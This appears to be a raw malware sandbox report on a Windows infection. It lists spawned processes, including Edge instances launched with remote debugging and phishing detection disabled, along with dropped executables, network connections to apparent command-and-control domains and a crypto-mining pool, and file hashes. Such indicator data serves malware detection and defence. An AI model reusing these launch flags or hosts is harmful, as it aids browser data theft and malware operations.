C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 2356"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vgpnm4xz\vgpnm4xz.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB81B.tmp" "c:\Users\Admin\AppData\Local\Temp\vgpnm4xz\CSCBC6EB7F1C56F4088AC3A5D91EAABC6C2.TMP"
C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe
"C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3956 /prefetch:2
C:\Windows\explorer.exe
explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3964 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2208 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4784 /prefetch:2
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2536 /prefetch:2
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe
"C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| NL | 45.154.98.175:6969 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 192.248.189.11:443 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | farmingtzricks.top | udp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| DE | 5.75.210.149:443 | tcp | |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | ls.t.goldenloafuae.com | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 104.86.110.200:80 | e5.o.lencr.org | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | towerbingobongoboom.com | udp |
| US | 213.209.150.137:4000 | towerbingobongoboom.com | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 213.209.150.137:4117 | towerbingobongoboom.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| CH | 185.208.156.162:80 | 185.208.156.162 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 172.217.169.74:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.180.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.169.65:443 | clients2.googleusercontent.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 150.171.28.10:443 | tcp | |
| US | 8.8.8.8:53 | exarthynature.run | udp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.21:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 104.21.112.1:443 | exarthynature.run | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 150.171.28.10:443 | tcp | |
| US | 150.171.28.10:443 | tcp | |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tcp | |
| US | 150.171.28.10:443 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.22:443 | nw-umwatson.events.data.microsoft.com | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 8.8.8.8:53 | hobbyedsmoker.live | udp |
| US | 8.8.8.8:53 | dsfljsdfjewf.info | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 8.8.8.8:53 | dawtastream.bet | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 8.8.8.8:53 | collapimga.fun | udp |
| US | 8.8.8.8:53 | seizedsentec.online | udp |
| US | 8.8.8.8:53 | strawpeasaen.fun | udp |
| US | 8.8.8.8:53 | quietswtreams.life | udp |
| US | 8.8.8.8:53 | starrynsightsky.icu | udp |
| US | 8.8.8.8:53 | earthsymphzony.today | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 172.67.220.226:443 | farmingtzricks.top | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | croprojegies.run | udp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 104.21.64.1:443 | croprojegies.run | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp |
Files
memory/116-0-0x0000000000700000-0x0000000000BB0000-memory.dmp
memory/116-1-0x0000000077034000-0x0000000077036000-memory.dmp
memory/116-2-0x0000000000701000-0x000000000072F000-memory.dmp
memory/116-3-0x0000000000700000-0x0000000000BB0000-memory.dmp
memory/116-4-0x0000000000700000-0x0000000000BB0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
| MD5 | 457a48e9c0a205ea619dd5d5b4c2a6c3 |
| SHA1 | 15b8560577817747c13dc391d973ad2e26901315 |
| SHA256 | f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e |
| SHA512 | ce53209091c4e22937bf82bd55e219347d4d3a5c339db8b5605ee4753edc2dbe292c40a3da7d736908c27f5c99636fd3c06ab4c81254366d89801cf3d9037e5a |
memory/116-18-0x0000000000700000-0x0000000000BB0000-memory.dmp
memory/4896-17-0x0000000000050000-0x0000000000500000-memory.dmp
memory/4896-19-0x0000000000051000-0x000000000007F000-memory.dmp
memory/4896-20-0x0000000000050000-0x0000000000500000-memory.dmp
memory/4896-21-0x0000000000050000-0x0000000000500000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
| MD5 | 5b3ed060facb9d57d8d0539084686870 |
| SHA1 | 9cae8c44e44605d02902c29519ea4700b4906c76 |
| SHA256 | 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207 |
| SHA512 | 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a |
C:\Users\Admin\AppData\Local\Temp\D64B.tmp\D64C.tmp\D64D.bat
| MD5 | 3895cb9413357f87a88c047ae0d0bd40 |
| SHA1 | 227404dd0f7d7d3ea9601eecd705effe052a6c91 |
| SHA256 | 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785 |
| SHA512 | a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mimzltsg.xrf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3108-38-0x000001C7A7A30000-0x000001C7A7A52000-memory.dmp
memory/4896-48-0x0000000000050000-0x0000000000500000-memory.dmp
memory/4896-49-0x0000000000050000-0x0000000000500000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
| MD5 | 73636685f823d103c54b30bc457c7f0d |
| SHA1 | 597dba03dce00cf6d30b082c80c8f9108ae90ccf |
| SHA256 | 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c |
| SHA512 | 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7 |
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
| MD5 | 47177b7fbf1ce282fb87da80fd264b3f |
| SHA1 | d07d2f9624404fa882eb94ee108f222d76bbbd4c |
| SHA256 | e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb |
| SHA512 | 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9 |
memory/1860-92-0x0000000000090000-0x00000000000A0000-memory.dmp
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
| MD5 | 1dc908064451d5d79018241cea28bc2f |
| SHA1 | f0d9a7d23603e9dd3974ab15400f5ad3938d657a |
| SHA256 | d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454 |
| SHA512 | 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f |
memory/2248-106-0x0000000000400000-0x0000000000840000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb4d127b8a6f84a1cee423c5e3e3a51d |
| SHA1 | c55263a8ff097067f2393ce2120801a445fd1949 |
| SHA256 | d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514 |
| SHA512 | 45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e |
C:\Users\Admin\AppData\Local\Temp\installer.ps1
| MD5 | b6d611af4bea8eaaa639bbf024eb0e2d |
| SHA1 | 0b1205546fd80407d85c9bfbed5ff69d00645744 |
| SHA256 | 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b |
| SHA512 | d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d |
\??\c:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.cmdline
| MD5 | b0a97c4ef81b608d237aa9925507d758 |
| SHA1 | dcbab80b6ed3c9b29fb747184cd9f99079e3cd62 |
| SHA256 | 81edfd330be163406ec87563259246365f85000713715931915a19c9c688f554 |
| SHA512 | 57c9339aa6503fd0cdbb6122ecff3b7528e6059c43eb51b3023e76d1bc4b176cf642904e835f73320127ee29e234d1ce3df3a5ffaa1ca20483cbfbd29f47c0a6 |
\??\c:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.0.cs
| MD5 | 1809fe3ba081f587330273428ec09c9c |
| SHA1 | d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9 |
| SHA256 | d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457 |
| SHA512 | e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28 |
C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe
| MD5 | 8a632abe880092fb8fe1d3c882c417a5 |
| SHA1 | d3773cc8e6dc6dcd757a5cbc3269b435885fbbf4 |
| SHA256 | 7f37d73657533b0e599dfac9fb0267c3e38342f1aeb475e3b72421440c95ece7 |
| SHA512 | 3f9238f924e2cf022bd4d9c9c151b85055cd969561304de47baec945754e4e7b63e00a5ec7cfb2344d9c71c4a75e9a0d7f0c4fa16a0707cef87619240e63c196 |
\??\c:\Users\Admin\AppData\Local\Temp\31xayw5v\CSC124C6D5AD9C742CBB436A684BDC2DF.TMP
| MD5 | b4db40efa0a6c339775119fd65ac7774 |
| SHA1 | c1286ca53d011ce3af29dee628ea1df5443fef7a |
